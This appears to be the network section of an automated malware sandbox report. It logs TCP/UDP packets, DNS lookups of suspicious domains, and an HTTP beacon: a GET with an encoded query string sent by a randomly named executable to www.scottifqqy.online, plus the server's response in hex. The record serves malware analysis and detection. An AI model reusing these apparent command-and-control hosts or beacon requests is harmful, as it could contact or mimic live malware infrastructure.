                                  Jul 17, 2024 18:59:57.833262920 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.833281994 CEST6389380192.168.2.6185.179.189.181
                                  Jul 17, 2024 18:59:57.833292007 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 18:59:57.833316088 CEST6389380192.168.2.6185.179.189.181
                                  Jul 17, 2024 18:59:57.833338022 CEST6389380192.168.2.6185.179.189.181
                                  Jul 17, 2024 18:59:57.848619938 CEST6389380192.168.2.6185.179.189.181
                                  Jul 17, 2024 18:59:57.854101896 CEST8063893185.179.189.181192.168.2.6
                                  Jul 17, 2024 19:00:18.291317940 CEST6389580192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:18.301954985 CEST8063895172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:18.302052021 CEST6389580192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:18.322715044 CEST6389580192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:18.329575062 CEST8063895172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:19.258730888 CEST8063895172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:19.259077072 CEST8063895172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:19.259253025 CEST6389580192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:19.835130930 CEST6389580192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:20.867496967 CEST6389680192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:20.874772072 CEST8063896172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:20.874881983 CEST6389680192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:20.893569946 CEST6389680192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:20.901310921 CEST8063896172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:21.843307018 CEST8063896172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:21.843571901 CEST8063896172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:21.843719959 CEST6389680192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:22.397708893 CEST6389680192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:23.431900978 CEST6389780192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:23.440886974 CEST8063897172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:23.440996885 CEST6389780192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:23.461924076 CEST6389780192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:23.467005014 CEST8063897172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:23.467091084 CEST8063897172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:24.415227890 CEST8063897172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:24.415666103 CEST8063897172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:24.415756941 CEST6389780192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:24.975655079 CEST6389780192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:26.008438110 CEST6389880192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:26.013550997 CEST8063898172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:26.013648987 CEST6389880192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:26.031224012 CEST6389880192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:26.036127090 CEST8063898172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:26.999006033 CEST8063898172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:26.999377012 CEST8063898172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:26.999459982 CEST6389880192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:27.007105112 CEST6389880192.168.2.6172.96.191.69
                                  Jul 17, 2024 19:00:27.018534899 CEST8063898172.96.191.69192.168.2.6
                                  Jul 17, 2024 19:00:32.076383114 CEST6389980192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:32.082515001 CEST806389913.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:32.082619905 CEST6389980192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:32.101264000 CEST6389980192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:32.106372118 CEST806389913.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:32.576929092 CEST806389913.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:32.577007055 CEST6389980192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:33.616543055 CEST6389980192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:33.621756077 CEST806389913.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:34.649022102 CEST6390080192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:35.131326914 CEST806390013.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:35.131427050 CEST6390080192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:35.154923916 CEST6390080192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:35.160799980 CEST806390013.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:35.621478081 CEST806390013.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:35.621546984 CEST6390080192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:36.664081097 CEST6390080192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:36.669202089 CEST806390013.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:37.696037054 CEST6390180192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:37.701483011 CEST806390113.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:37.701576948 CEST6390180192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:37.730490923 CEST6390180192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:37.778172016 CEST806390113.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:37.778745890 CEST806390113.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:38.233105898 CEST806390113.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:38.233206987 CEST6390180192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:39.244405985 CEST6390180192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:39.249361038 CEST806390113.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:40.279434919 CEST6390280192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:40.290190935 CEST806390213.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:40.290298939 CEST6390280192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:40.312082052 CEST6390280192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:40.317720890 CEST806390213.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:40.776273012 CEST806390213.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:40.778158903 CEST806390213.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:40.778213024 CEST6390280192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:40.788537979 CEST6390280192.168.2.613.248.169.48
                                  Jul 17, 2024 19:00:40.821504116 CEST806390213.248.169.48192.168.2.6
                                  Jul 17, 2024 19:00:45.850536108 CEST6390380192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:45.855750084 CEST8063903162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:45.855817080 CEST6390380192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:45.875765085 CEST6390380192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:45.881028891 CEST8063903162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:47.382097006 CEST6390380192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:47.392138958 CEST8063903162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:47.392247915 CEST6390380192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:48.415702105 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:48.461708069 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:48.461810112 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:48.496813059 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:48.510754108 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.814909935 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.814934015 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.814984083 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.815005064 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.816356897 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.816373110 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.816406012 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.817234039 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.817250013 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.817281961 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.818510056 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.818526983 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.818624020 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.819751978 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.819796085 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.820142031 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.820537090 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.820594072 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.901336908 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.901626110 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.901642084 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.901693106 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.902795076 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.903101921 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.903343916 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.903359890 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.903404951 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.904361010 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.904377937 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.904418945 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.905524015 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.905539989 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.905587912 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.906825066 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.906841993 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.907012939 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.908093929 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.908147097 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.909382105 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.909398079 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.909837961 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.910403013 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.910419941 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.910434961 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.910487890 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.911432028 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.911447048 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.911500931 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.912466049 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.912527084 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.992147923 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.992403984 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.992420912 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.992471933 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.993088007 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.993103981 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.993146896 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:49.993885994 CEST8063904162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:49.993938923 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:50.007220984 CEST6390480192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:51.042542934 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:51.051851034 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:51.051981926 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:51.072601080 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:51.080840111 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:51.085391998 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.334973097 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.334986925 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.334996939 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.335086107 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.336532116 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.336544037 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.336605072 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.337992907 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.338002920 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.338052034 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.338260889 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.338273048 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.338489056 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.339627981 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.339724064 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.340018988 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.340590954 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.340779066 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.425533056 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.426264048 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.426278114 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.426408052 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.427084923 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.427189112 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.427649021 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.427659035 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.428205967 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.428867102 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.428879976 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.428931952 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.430346966 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.430360079 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.430465937 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.431107998 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.431124926 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.431230068 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.432354927 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.432374001 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.432461977 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.433634043 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.433653116 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.433671951 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.433815956 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.434681892 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.434700966 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.434776068 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.435400963 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.435416937 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.435430050 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.435554028 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.435554028 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.541835070 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.542162895 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.542176008 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.542331934 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.543270111 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.543382883 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.556777000 CEST8063905162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:52.560080051 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:52.588272095 CEST6390580192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:53.624525070 CEST6390780192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:53.636013985 CEST8063907162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:53.636113882 CEST6390780192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:53.652504921 CEST6390780192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:53.659629107 CEST8063907162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:54.772675037 CEST8063907162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:54.774240017 CEST8063907162.159.134.42192.168.2.6
                                  Jul 17, 2024 19:00:54.774305105 CEST6390780192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:54.782886982 CEST6390780192.168.2.6162.159.134.42
                                  Jul 17, 2024 19:00:54.787957907 CEST8063907162.159.134.42192.168.2.6

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 17, 2024 18:59:26.435115099 CEST5355921162.159.36.2192.168.2.6
                                  Jul 17, 2024 18:59:26.921986103 CEST5571953192.168.2.61.1.1.1
                                  Jul 17, 2024 18:59:26.940397024 CEST53557191.1.1.1192.168.2.6
                                  Jul 17, 2024 18:59:56.936863899 CEST5468653192.168.2.61.1.1.1
                                  Jul 17, 2024 18:59:57.027658939 CEST53546861.1.1.1192.168.2.6
                                  Jul 17, 2024 19:00:17.929001093 CEST6065153192.168.2.61.1.1.1
                                  Jul 17, 2024 19:00:18.270139933 CEST53606511.1.1.1192.168.2.6
                                  Jul 17, 2024 19:00:32.042959929 CEST6195553192.168.2.61.1.1.1
                                  Jul 17, 2024 19:00:32.068703890 CEST53619551.1.1.1192.168.2.6
                                  Jul 17, 2024 19:00:45.825529099 CEST6024653192.168.2.61.1.1.1
                                  Jul 17, 2024 19:00:45.842580080 CEST53602461.1.1.1192.168.2.6
                                  Jul 17, 2024 19:01:00.638252020 CEST5324953192.168.2.61.1.1.1
                                  Jul 17, 2024 19:01:00.823290110 CEST53532491.1.1.1192.168.2.6

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 17, 2024 18:59:26.921986103 CEST192.168.2.61.1.1.10xdd4eStandard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                  Jul 17, 2024 18:59:56.936863899 CEST192.168.2.61.1.1.10x6ee4Standard query (0)www.scottifqqy.onlineA (IP address)IN (0x0001)false
                                  Jul 17, 2024 19:00:17.929001093 CEST192.168.2.61.1.1.10xda65Standard query (0)www.ancuapengiu28.comA (IP address)IN (0x0001)false
                                  Jul 17, 2024 19:00:32.042959929 CEST192.168.2.61.1.1.10xd3b7Standard query (0)www.techacademy.storeA (IP address)IN (0x0001)false
                                  Jul 17, 2024 19:00:45.825529099 CEST192.168.2.61.1.1.10x3a07Standard query (0)www.goodneighbor.clubA (IP address)IN (0x0001)false
                                  Jul 17, 2024 19:01:00.638252020 CEST192.168.2.61.1.1.10xb644Standard query (0)www.me-sa.onlineA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 17, 2024 18:59:26.940397024 CEST1.1.1.1192.168.2.60xdd4eName error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                  Jul 17, 2024 18:59:57.027658939 CEST1.1.1.1192.168.2.60x6ee4No error (0)www.scottifqqy.online185.179.189.181A (IP address)IN (0x0001)false
                                  Jul 17, 2024 19:00:18.270139933 CEST1.1.1.1192.168.2.60xda65No error (0)www.ancuapengiu28.comancuapengiu28.comCNAME (Canonical name)IN (0x0001)false
                                  Jul 17, 2024 19:00:18.270139933 CEST1.1.1.1192.168.2.60xda65No error (0)ancuapengiu28.com172.96.191.69A (IP address)IN (0x0001)false
                                  Jul 17, 2024 19:00:32.068703890 CEST1.1.1.1192.168.2.60xd3b7No error (0)www.techacademy.store13.248.169.48A (IP address)IN (0x0001)false
                                  Jul 17, 2024 19:00:32.068703890 CEST1.1.1.1192.168.2.60xd3b7No error (0)www.techacademy.store76.223.54.146A (IP address)IN (0x0001)false
                                  Jul 17, 2024 19:00:45.842580080 CEST1.1.1.1192.168.2.60x3a07No error (0)www.goodneighbor.clubgoodneighbor.clubCNAME (Canonical name)IN (0x0001)false
                                  Jul 17, 2024 19:00:45.842580080 CEST1.1.1.1192.168.2.60x3a07No error (0)goodneighbor.club162.159.134.42A (IP address)IN (0x0001)false
                                  Jul 17, 2024 19:01:00.823290110 CEST1.1.1.1192.168.2.60xb644No error (0)www.me-sa.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                  Jul 17, 2024 19:01:00.823290110 CEST1.1.1.1192.168.2.60xb644No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                  Jul 17, 2024 19:01:00.823290110 CEST1.1.1.1192.168.2.60xb644No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • www.scottifqqy.online
                                  • www.ancuapengiu28.com
                                  • www.techacademy.store
                                  • www.goodneighbor.club

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.663893185.179.189.181805316C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 17, 2024 18:59:57.073970079 CEST435OUTGET /midu/?zn6L=9nR4RRbtczDLM92wROaICO8mWeENBuMayS9RmkCU7FdLWzi6Zh5WY9LbBJga/o2cXaf6PRrIolXtwoFpXTr9SyPSPVCys8awhBwFZAVidM2Yj+9OFlKtZImodfdv2xp/fybq7VQ=&BF=AP6PLVoH-l HTTP/1.1
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en
                                  Host: www.scottifqqy.online
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                  Jul 17, 2024 18:59:57.832782030 CEST1236INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Wed, 17 Jul 2024 16:59:57 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 7742
                                  Connection: close
                                  Cache-Control: no-cache, no-store, must-revalidate
                                  Expires: Wed, 17 Jul 2024 16:59:57 GMT
                                  Set-Cookie: _subid=1eic6uc5ium; expires=Sat, 17 Aug 2024 16:59:57 GMT; path=/
                                  Set-Cookie: 4c7a9=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjQzODFcIjoxNzIxMjM1NTk3fSxcImNhbXBhaWduc1wiOntcIjE0MTFcIjoxNzIxMjM1NTk3fSxcInRpbWVcIjoxNzIxMjM1NTk3fSJ9.vLjw0wgN0otNlEtxJcWZvExQ1KDPoESK-97J9aw5X2s; expires=Thu, 02 Feb 2079 09:59:54 GMT; path=/
                                  Set-Cookie: a90624f7lp1411=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoiODA2In0.k6xjJGpwMm2_CBJwU3JzuC-mEUO2nVnQcsQIqhR59a8; expires=Fri, 10 Jan 198392 13:59:57 GMT; path=/
                                  Set-Cookie: a90624f7lp1411ip=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoiXCI4LjQ2LjEyMy4zM1wiIn0.8p3iaUjw-d2CpKgR-5Ws_zhLYUW2RmptlB9M-1uFdK4; expires=Fri, 10 Jan 198392 13:59:57 GMT; path=/
                                  Vary: Accept-Encoding
                                  Access-Control-Allow-Origin: *
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 2f 6e 6f 76 69 65 2d 7a 61 63 6f 6e 69 2d 73 2d 31 2d 69 79 75 6e 79 61 2d 32 30 32 34 2d 67 6f 64 61 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b0 d0 b6 d0 bd d1 8b d0 b5 20 d0 bd d0 be d0 b2 d0 be d1 81 d1 82 d0 b8 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20
                                  Data Ascii: <!DOCTYPE html> <html> <head><base href="/lander/novie-zaconi-s-1-iyunya-2024-goda/index.html"> <title> </title> <meta charset="UTF-8"> <meta
                                  Jul 17, 2024 18:59:57.833019018 CEST224INData Raw: 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74
                                  Data Ascii: http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <span id="0aa54c9b-2ec8-d0f0-247f-aebdff4fa0d5"></span> <script src="policy/valid
                                  Jul 17, 2024 18:59:57.833050966 CEST1236INData Raw: 61 74 6f 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70
                                  Data Ascii: ator.js"></script> <link rel="stylesheet" href="style.css"> <script> function handleSubmit(event) { event.preventDefault(); alert(" !");
